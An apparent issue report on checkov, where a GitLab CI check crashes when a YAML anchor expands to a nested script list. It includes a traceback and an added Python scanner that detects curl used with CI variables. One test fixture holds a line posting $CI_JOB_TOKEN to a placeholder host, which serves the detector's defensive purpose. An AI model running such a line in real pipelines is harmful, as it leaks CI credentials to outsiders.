Status: Open
Labels: checks (Check additions or changes)
Description
Steps to reproduce:

- Create a `.gitlab-ci.yml` file; the name is important. Content:

  ```yaml
  .gitlab_creds: &gitlab_creds
    - echo hello

  fmt:
    image: alpine/terragrunt:tf1.12.2
    script:
      - *gitlab_creds
      - terraform fmt -check -recursive
  ```

  The `- *gitlab_creds` is an anchor, documented here.

- Run checkov:

  ```shell
  podman run --tty --rm --volume $(pwd):/tf bridgecrew/checkov:3.2.495 --file /tf/.gitlab-ci.yml
  ```

  Output:

  ```text
  2025-12-04 16:50:19,587 [MainThread ] [ERROR] Failed to run check CKV_GITLABCI_1 on /tf/.gitlab-ci.yml:*.script[].*.script[]
  Traceback (most recent call last):
    File "/usr/local/lib/python3.11/site-packages/checkov/common/checks/base_check.py", line 68, in run
      check_result["result"] = self.scan_entity_conf(entity_configuration, entity_type)
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    File "/usr/local/lib/python3.11/site-packages/checkov/gitlab_ci/checks/base_gitlab_ci_check.py", line 31, in scan_entity_conf
      return self.scan_conf(conf)
             ^^^^^^^^^^^^^^^^^^^^
    File "/usr/local/lib/python3.11/site-packages/checkov/gitlab_ci/checks/job/SuspectCurlInScript.py", line 21, in scan_conf
      for line in conf.values():
                  ^^^^^^^^^^^
  AttributeError: 'list' object has no attribute 'values'

  _ _
  ___| |__ ___ ___| | _______ __
  / __| '_ \ / _ \/ __| |/ / _ \ \ / /
  | (__| | | | __/ (__| < (_) \ V /
  \___|_| |_|\___|\___|_|\_\___/ \_/

  By Prisma Cloud | version: 3.2.494
  Update available 3.2.494 -> 3.2.495
  Run pip3 install -U checkov to update

  gitlab_ci scan results:

  Passed checks: 2, Failed checks: 0, Skipped checks: 0

  Check: CKV_GITLABCI_1: "Suspicious use of curl with CI environment variables in script"
      PASSED for resource: fmt
      File: /tf/.gitlab-ci.yml:8-9
  Check: CKV_GITLABCI_3: "Detecting image usages in gitlab workflows"
      PASSED for resource: fmt
      File: /tf/.gitlab-ci.yml:5-6
  ```
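The traceback above shows the check receiving a `list` where it expected something with `.values()`: when a YAML alias such as `*gitlab_creds` expands to a list, the job's `script` becomes a list that contains a list. The following is an added example (not checkov's code and not from the reporter) of an anchor-aware walk over `script:` values plus a simple "curl with a CI_* variable" heuristic, so the same input no longer breaks the scan. Assumptions, which are not on the page: the `PIPELINE` and `LEAKY_PIPELINE` structures are constructed by hand to mirror what a YAML loader returns for the report's file, `GLOBAL_KEYWORDS` is an assumed, non-exhaustive list of non-job top-level keys, and `is_suspicious_curl` is an approximation of CKV_GITLABCI_1's rule, not its exact logic.

```python
"""Anchor-aware walk of GitLab CI `script:` values (added example, not checkov code)."""
from __future__ import annotations

import re
from typing import Any, Iterator

# Constructed input: the Python structure a YAML loader (e.g. PyYAML safe_load)
# returns for the .gitlab-ci.yml in the report. The alias `*gitlab_creds`
# resolves to the very list the `.gitlab_creds` anchor defines, so the job's
# `script` is a list containing a list, not a flat list of strings.
GITLAB_CREDS = ["echo hello"]
PIPELINE: dict[str, Any] = {
    ".gitlab_creds": GITLAB_CREDS,
    "fmt": {
        "image": "alpine/terragrunt:tf1.12.2",
        "script": [GITLAB_CREDS, "terraform fmt -check -recursive"],
    },
}

# Constructed input: a job whose anchored fragment does ship a CI token to a
# remote host, plus a job that uses curl without any CI_* variable.
LEAKY_FRAGMENT = ['curl -d "token=$CI_JOB_TOKEN" https://example.invalid/collect']
LEAKY_PIPELINE: dict[str, Any] = {
    ".leak": LEAKY_FRAGMENT,
    "leak": {"script": [LEAKY_FRAGMENT, "echo done"]},
    "clean": {"script": "curl -sSf https://example.invalid/health"},
}

# Top-level GitLab keywords that are never jobs (assumed list, not exhaustive).
GLOBAL_KEYWORDS = {
    "default", "include", "stages", "variables", "workflow",
    "image", "services", "cache", "before_script", "after_script",
}

# `curl` at the start of a line or after a shell separator, and any $CI_* / ${CI_*} reference.
CURL = re.compile(r"(^|[\s;&|(])curl\b")
CI_VARIABLE = re.compile(r"\$\{?CI_[A-Z0-9_]+\}?")


def iter_script_lines(script: Any) -> Iterator[str]:
    """Yield every command string in a `script:` value.

    GitLab accepts a string, a list of strings, or nested lists (which is what
    YAML anchors/aliases and `!reference` produce); this walks all of them.
    """
    if script is None:
        return
    if isinstance(script, str):
        yield script
    elif isinstance(script, list):
        for item in script:
            yield from iter_script_lines(item)
    else:
        # Mappings or other scalar types are not valid script entries.
        raise TypeError(f"unsupported script entry: {type(script).__name__}")


def is_suspicious_curl(line: str) -> bool:
    """Heuristic (assumed, not checkov's exact rule): curl invoked with a CI_* variable."""
    return bool(CURL.search(line) and CI_VARIABLE.search(line))


def scan_pipeline(pipeline: dict[str, Any]) -> dict[str, list[str]]:
    """Map each job name to the script lines that trip the heuristic (empty list if none)."""
    findings: dict[str, list[str]] = {}
    for name, body in pipeline.items():
        # Hidden keys (leading dot) and global keywords are not jobs.
        if name.startswith(".") or name in GLOBAL_KEYWORDS or not isinstance(body, dict):
            continue
        findings[name] = [
            line for line in iter_script_lines(body.get("script"))
            if is_suspicious_curl(line)
        ]
    return findings


if __name__ == "__main__":
    print(list(iter_script_lines(PIPELINE["fmt"]["script"])))
    print(scan_pipeline(PIPELINE))
    print(scan_pipeline(LEAKY_PIPELINE))
```

The point of `iter_script_lines` is that it descends into nested lists before any per-line logic runs; a check that iterates `script` entries directly, as the one in the traceback does, sees the expanded alias as a `list` rather than a string or mapping and fails before it can evaluate the job at all.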